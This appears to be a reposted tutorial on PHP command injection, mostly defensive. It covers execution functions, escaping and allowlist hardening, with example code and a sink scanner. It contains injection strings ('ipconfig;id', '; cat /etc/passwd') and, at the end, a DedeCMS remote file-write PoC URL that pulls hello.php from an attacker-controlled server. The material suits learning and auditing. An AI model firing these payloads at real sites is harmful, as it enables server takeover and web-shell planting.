PHP command injection, with a DedeCMS remote file-write vulnerability link and example

Source: Internet
Author: User
Tags: php language
PHP command injection is one of the common script-level vulnerabilities in PHP applications; well-known domestic Web applications such as Discuz! and DedeCMS have had vulnerabilities of this type.

Command injection arises when a Web application does not strictly validate the data a user submits. The attacker constructs a request that carries shell metacharacters or a complete command string, the application hands it to a function that runs an external program or system command, and the attacker's command executes on the server, giving illegal access to data or network resources.
The root cause is that the developer, when using one of the PHP functions that execute commands, does not strictly filter the user-supplied data that ends up in the function's argument. For example, if the attacker can make the injected command write a PHP file into the Web root, a PHP backdoor is created through the injection point and the attack proceeds from there.
The impact of a command injection vulnerability is severe: arbitrary code execution in the context of the Web server account. Several measures reduce the risk:
1. Avoid executing external programs or commands at all wherever possible.
2. Use a PHP function or library that provides the same functionality instead of shelling out.
3. Validate, ideally against an allowlist, the contents of every parameter before it reaches system(), exec() or similar functions. The same rule applies to eval(), although eval() is a code-injection sink rather than a command-injection sink.
4. Pass each user-supplied value through escapeshellarg(). On POSIX systems escapeshellarg() wraps the value in single quotes and rewrites every embedded single quote as '\'' (close the quotes, a backslash-escaped quote, reopen the quotes), so the shell receives the whole value as one literal argument and characters such as ";", "|", "&", "`" and "$" inside it cannot terminate or extend the command. It does not escape double quotes or semicolons individually, as is sometimes claimed; the surrounding single quotes are what make them harmless. On Windows it instead wraps the value in double quotes and replaces embedded double quotes, percent signs and exclamation marks with spaces.
5. Restrict which executables may run. In PHP before 5.4, set safe_mode = On in php.ini and point safe_mode_exec_dir at a directory that holds only the approved binaries; any external program outside that directory then fails to run. safe_mode was deprecated in PHP 5.3 and removed in 5.4, so on current versions use disable_functions in php.ini to turn off the execution functions the application does not need, and limit the Web server account's permissions instead.
Command injection is common in PHP applications. Large domestic PHP programs such as Discuz! and DedeCMS have had command-injection vulnerabilities published, through which attackers quickly gained control of the site and then planted web shells, drive-by trojans and phishing pages, causing widespread harm. Since PHP accounts for a large share of Web application development, developers should understand the threat and patch such vulnerabilities before they are exploited, so that users are protected from trojan and phishing attacks.

2. Use of command execution functions

In PHP, an external program or system command can be run through the following eight functions and operators.

2.1 system() function

system() runs an external program and prints its output. The prototype is: string system(string $command, int &$return_var), where $command is the command to execute and $return_var receives the exit status of the command. From the developer's point of view, the purpose of a command execution function is to let the Web application interact with the operating system, for example to obtain the server's IP address or current user by calling system(). A typical page reads the cmd request parameter into a variable named $action and calls system($action); $action is then the command that gets executed. When debugging PHP with var_dump() or print_r(), the browser does not preserve line breaks, which makes large outputs hard to read; printing a <pre> tag before the output keeps the formatting.
Requesting http://localhost/test.php?cmd=ipconfig in the browser assigns ipconfig to cmd, and system() prints the machine's IP configuration. Because nothing restricts the value, the user controls the whole command line: cmd=ipconfig;id (or, on Windows, cmd=ipconfig%26whoami) runs a second command of the attacker's choosing, and that is the injection.
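The test.php the text describes, as an added example that is not part of the original article: the vulnerable page beside a version that never lets user data reach the shell. The $action variable, the cmd parameter and ipconfig come from the text; ALLOWED_ACTIONS and the handler names are assumptions. Requires PHP 7+.

```php
<?php
// Added example, not from the original article. The vulnerable test.php the
// text describes, next to a hardened version. ALLOWED_ACTIONS and the handler
// names are assumptions; $action, cmd and ipconfig come from the article.

// --- Vulnerable version: the request parameter reaches the shell unchanged. ---
// GET /test.php?cmd=ipconfig            -> runs: ipconfig
// GET /test.php?cmd=ipconfig;id         -> runs: ipconfig, then id   (POSIX sh)
// GET /test.php?cmd=ipconfig%26whoami   -> runs: ipconfig & whoami   (cmd.exe)
function vulnerable_handler(array $get): void
{
    $action = $get['cmd'] ?? '';
    echo '<pre>';
    system($action);              // every shell metacharacter in $action is honoured
    echo '</pre>';
}

// --- Hardened version: the user picks a key, never a command string. ---
// The shell only ever sees constant strings written by the developer, so there
// is nothing for ';', '&&', '|', '`' or '$(...)' to attach to.
const ALLOWED_ACTIONS = [
    'ipconfig' => 'ipconfig',
    'whoami'   => 'whoami',
];

function hardened_handler(array $get): void
{
    $key = $get['cmd'] ?? '';
    if (!is_string($key) || !array_key_exists($key, ALLOWED_ACTIONS)) {
        http_response_code(400);  // reject anything that is not a known key
        echo 'unknown action';
        return;
    }
    echo '<pre>';
    // htmlspecialchars() keeps command output from being rendered as HTML/JS.
    echo htmlspecialchars(shell_exec(ALLOWED_ACTIONS[$key]) ?? '', ENT_QUOTES, 'UTF-8');
    echo '</pre>';
}

hardened_handler($_GET);
```

The hardened handler does not try to strip or escape "bad characters" from the input; it treats the input only as a lookup key, which is the approach that survives encoding tricks and shell features the developer did not think of.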

2.2 exec() function

exec() runs an external program without printing its output. The prototype is:

string exec(string $command [, array &$output [, int &$return_var]])

$command is the command to execute; $output receives one array element per line of the command's output; $return_var receives the exit status. The return value is only the last line of output, which is why $output is needed to capture everything.

2.3 passthru() function

passthru() runs a system command and passes its raw output straight through to the output buffer. When the command produces binary data (an image, for instance) that must be returned to the browser unchanged, passthru() should be used in place of system() and exec(). The prototype is:

void passthru(string $command, int &$return_var)

$command is the command to execute and $return_var receives the exit status. You can test it with a page that calls passthru() the same way as the system() example above.

2.4 shell_exec() function

shell_exec() runs a command through the shell and returns its complete output as a string (null if the command produces no output or could not be run). The prototype is:

string shell_exec(string $command)

$command is the command to execute.

2.5 Backtick operator

A string enclosed in backticks, `command`, is executed through the shell and its output is returned as a string, exactly like shell_exec(). The operator is disabled whenever shell_exec() is disabled through disable_functions, but because it has no function name it is easy to overlook when auditing code.

2.6 popen() function

popen() opens a pipe to a process started by running the given command through the shell. It returns a file pointer that is unidirectional (read-only or write-only) and must be closed with pclose(); false is returned on error. The prototype is: resource popen(string $command, string $mode), where $command is the command to execute and $mode is "r" to read the process's output or "w" to write to its input.

2.7 proc_open() function

proc_open() runs a command and opens file pointers for its standard input, output and error streams. It is similar to popen() but considerably more powerful: the descriptor specification, working directory and environment are all under the caller's control. The prototype is:
resource proc_open(string|array $cmd, array $descriptorspec, array &$pipes [, string $cwd [, array $env [, array $other_options]]])
As of PHP 7.4, $cmd may be an array; the program is then started directly with those argv entries and no shell is involved, so shell metacharacters in user data cannot alter the command.

2.8 pcntl_exec() function

pcntl_exec() executes the given program in the current process space, replacing the PHP process. It returns false on error and does not return at all on success. The prototype is: void pcntl_exec(string $path [, array $args [, array $envs]]), where $path must be the path of an executable binary or of a script whose first line names its interpreter; $args is an array of strings passed to the program as its arguments; $envs is an array of environment variables in key => value form, key being the variable name and value its value. No shell is involved, so metacharacters in $args are harmless, but an attacker-controlled $path is still arbitrary code execution. The PHP manual advises against enabling the pcntl extension in a Web server environment.
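As an added example (not code from the article), the list in 2.1 to 2.8 turned into a small audit tool: a tokenizer-based scanner that reports every call to one of those sinks whose first argument is not a single string literal, plus every use of the backtick operator. It requires PHP 7.4+; the sample source at the bottom is constructed for the demo and the function names are assumptions.

```php
<?php
// Added example, not from the original article: a tokenizer-based scanner for
// the command-execution sinks in sections 2.1-2.8. Requires PHP 7.4+.
// Usage: php find_sinks.php [file.php]   (without a file, scans the sample below)

const COMMAND_SINKS = [
    'system', 'exec', 'passthru', 'shell_exec', 'popen', 'proc_open', 'pcntl_exec',
];
const SKIP_TOKENS = [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT];

/** Index of the next token that is not whitespace or a comment, or null. */
function next_significant(array $tokens, int $i): ?int
{
    for ($n = count($tokens); $i < $n; $i++) {
        if (!is_array($tokens[$i]) || !in_array($tokens[$i][0], SKIP_TOKENS, true)) {
            return $i;
        }
    }
    return null;
}

/** Index of the previous token that is not whitespace or a comment, or null. */
function prev_significant(array $tokens, int $i): ?int
{
    for ($i--; $i >= 0; $i--) {
        if (!is_array($tokens[$i]) || !in_array($tokens[$i][0], SKIP_TOKENS, true)) {
            return $i;
        }
    }
    return null;
}

/** Tokens of the first argument of the call whose '(' sits at $open. */
function first_argument(array $tokens, int $open): array
{
    $depth = 0;
    $arg   = [];
    for ($i = $open + 1, $n = count($tokens); $i < $n; $i++) {
        $t = $tokens[$i];
        if ($t === '(' || $t === '[') {
            $depth++;
        } elseif ($t === ')' || $t === ']') {
            if ($depth === 0) {
                break;                    // matching ')' of the call itself
            }
            $depth--;
        } elseif ($t === ',' && $depth === 0) {
            break;                        // end of the first argument
        }
        if (is_array($t) && in_array($t[0], SKIP_TOKENS, true)) {
            continue;
        }
        $arg[] = $t;
    }
    return $arg;
}

/** Returns [line, sink, detail] for each risky sink found in $source. */
function find_command_sinks(string $source): array
{
    $findings   = [];
    $tokens     = token_get_all($source);
    $line       = 1;
    $inBacktick = false;
    $nameKinds  = [T_STRING];             // PHP 8 emits \system( as a qualified name
    if (defined('T_NAME_FULLY_QUALIFIED')) {
        $nameKinds[] = T_NAME_FULLY_QUALIFIED;
    }

    foreach ($tokens as $i => $t) {
        if (is_array($t)) {
            $line = $t[2];                // array tokens carry their line number
        }
        if ($t === '`') {                 // backtick = shell_exec() with no name to grep for
            if (!$inBacktick) {
                $findings[] = [$line, '`...`', 'backtick operator'];
            }
            $inBacktick = !$inBacktick;
            continue;
        }
        if (!is_array($t) || !in_array($t[0], $nameKinds, true)) {
            continue;
        }
        $name = strtolower(ltrim($t[1], '\\'));
        if (!in_array($name, COMMAND_SINKS, true)) {
            continue;
        }
        // Ignore $obj->exec(), Foo::exec() and "function exec(" definitions.
        $prev = prev_significant($tokens, $i);
        if ($prev !== null && is_array($tokens[$prev])
            && in_array($tokens[$prev][0], [T_OBJECT_OPERATOR, T_DOUBLE_COLON, T_FUNCTION], true)) {
            continue;
        }
        $open = next_significant($tokens, $i + 1);
        if ($open === null || $tokens[$open] !== '(') {
            continue;                     // a bare name, not a call
        }
        $arg     = first_argument($tokens, $open);
        $literal = count($arg) === 1 && is_array($arg[0]) && $arg[0][0] === T_CONSTANT_ENCAPSED_STRING;
        if (!$literal) {
            $preview    = implode('', array_map(fn($x) => is_array($x) ? $x[1] : $x, $arg));
            $findings[] = [$line, $name, 'non-literal command: ' . $preview];
        }
    }
    return $findings;
}

// Constructed sample (not real application code) covering each case.
$sample = <<<'PHP'
<?php
$out = shell_exec('uptime');
system($_GET['cmd']);
$list = `ls -la $dir`;
exec("ping -c 1 " . escapeshellarg($host), $lines);
$db->exec('DELETE FROM t');
proc_open(['ls', '-la', $dir], $spec, $pipes);
PHP;

$source = isset($argv[1]) ? file_get_contents($argv[1]) : $sample;
foreach (find_command_sinks($source) as [$line, $sink, $detail]) {
    printf("line %d: %s (%s)\n", $line, $sink, $detail);
}
```

The sample is built so that the literal shell_exec() and the $db->exec() method call are not reported, while system(), the backtick line, exec() and proc_open() are. The exec() line is still reported even though it uses escapeshellarg(), and the proc_open() line even though its array form bypasses the shell: the scanner's job is to surface every place where non-constant data meets a sink, and the reviewer then decides whether the escaping or the call form actually makes it safe.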

3. Defense functions

When user input becomes part of a command, filter it with escapeshellarg() or escapeshellcmd() before it reaches the shell, so that the user cannot trick the system into executing arbitrary commands. Of the two, escapeshellarg() is the one to apply to individual values; escapeshellcmd() only hardens a complete command string and leaves spaces intact, so an attacker can still append extra arguments to the intended program.

3.1 escapeshellcmd() function

escapeshellcmd() escapes the shell metacharacters in a command string with a backslash; it does not remove them. The characters handled are & # ; ` | * ? ~ < > ^ ( ) [ ] { } $ \ together with the newline (\x0A) and \xFF; single and double quotes are escaped only when they are not paired. The prototype is: string escapeshellcmd(string $command). Escaping these characters stops the user from chaining or substituting commands, but not from adding options to the one the developer intended, because spaces and hyphens are left alone.

3.2 escapeshellarg() function

escapeshellarg() converts a string into something that can safely be used as a single shell argument: it wraps the string in single quotes and escapes any existing single quotes, so the value is passed to the shell as exactly one literal argument. It should be applied to every individual user-supplied parameter. Its behaviour depends on the current locale: under a non-UTF-8 locale such as the default "C" locale, multibyte characters such as Chinese text that are invalid in that locale are stripped from the result, so call setlocale(LC_CTYPE, ...) with a UTF-8 locale if such input has to survive. The prototype is: string escapeshellarg(string $arg), where $arg is the value to be escaped.
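As an added example (not code from the article): what escapeshellcmd() and escapeshellarg() produce for hostile input, the argument-injection case that escapeshellcmd() alone does not stop, and the PHP 7.4+ array form of proc_open() that avoids the shell altogether. The ping command, the $host values and the helper names are assumptions.

```php
<?php
// Added example, not from the original article. Shows what escapeshellcmd()
// and escapeshellarg() do to hostile input, the case escapeshellcmd() alone
// does not cover, and how to avoid the shell entirely (PHP 7.4+ for the
// array form of proc_open). ping, the $host values and helper names are assumed.

// Constructed attacker inputs for a "ping this host" feature.
$inputs = [
    "127.0.0.1",                   // benign
    "127.0.0.1; cat /etc/passwd",  // command separator
    "127.0.0.1 -c 100000",         // no metacharacters at all, just an extra option
    "it's",                        // embedded single quote
];

// escapeshellcmd() backslash-escapes ; | & $ ` and friends but leaves spaces
// and '-' untouched, so an appended option still reaches ping as a real argument.
function build_with_escapeshellcmd(string $host): string
{
    return escapeshellcmd("ping -c 1 " . $host);
}

// escapeshellarg() single-quotes the value (on POSIX), so the shell passes it
// to ping as exactly one argv entry, whatever it contains.
function build_with_escapeshellarg(string $host): string
{
    return "ping -c 1 " . escapeshellarg($host);
}

// With an array command, proc_open() starts the program directly, with no
// /bin/sh -c in between, so nothing ever parses metacharacters.
// Returns [exit status, stdout].
function run_without_shell(array $argv): array
{
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($argv, $spec, $pipes);
    if (!is_resource($proc)) {
        return [-1, ''];
    }
    $stdout = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    return [proc_close($proc), $stdout];
}

foreach ($inputs as $host) {
    echo "input:          $host\n";
    echo "escapeshellcmd: ", build_with_escapeshellcmd($host), "\n";
    echo "escapeshellarg: ", build_with_escapeshellarg($host), "\n\n";
}

// Here "127.0.0.1 -c 100000" is one (invalid) hostname argument rather than an
// extra option, so ping fails instead of sending 100000 packets.
[$status, $out] = run_without_shell(['ping', '-c', '1', '127.0.0.1 -c 100000']);
echo "proc_open array form exit status: $status\n";
```

For the second input escapeshellcmd() yields ping -c 1 127.0.0.1\; cat /etc/passwd, which no longer chains commands, but for the third it yields ping -c 1 127.0.0.1 -c 100000 unchanged, and ping accepts the injected option. escapeshellarg() renders those two as '127.0.0.1; cat /etc/passwd' and '127.0.0.1 -c 100000', and the fourth as 'it'\''s', each a single argument. Do not run escapeshellcmd() over a string that already contains escapeshellarg() output: it escapes the backslash inside '\'' and breaks the quoting. On Windows the output differs (double quotes, with embedded double quotes, % and ! replaced by spaces), so test on the platform you deploy to.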

Attached: DedeCMS remote file-write vulnerability link (not related to the knowledge point of this article)
https://www.seebug.org/vuldb/ssvid-89354
PoC:
http://<target ip>/install/index.php.bak?step=11&inslockfile=a&s_lang=a&install_demo_name=hello.php&updatehost=http://<self-controlled HTTP server>/
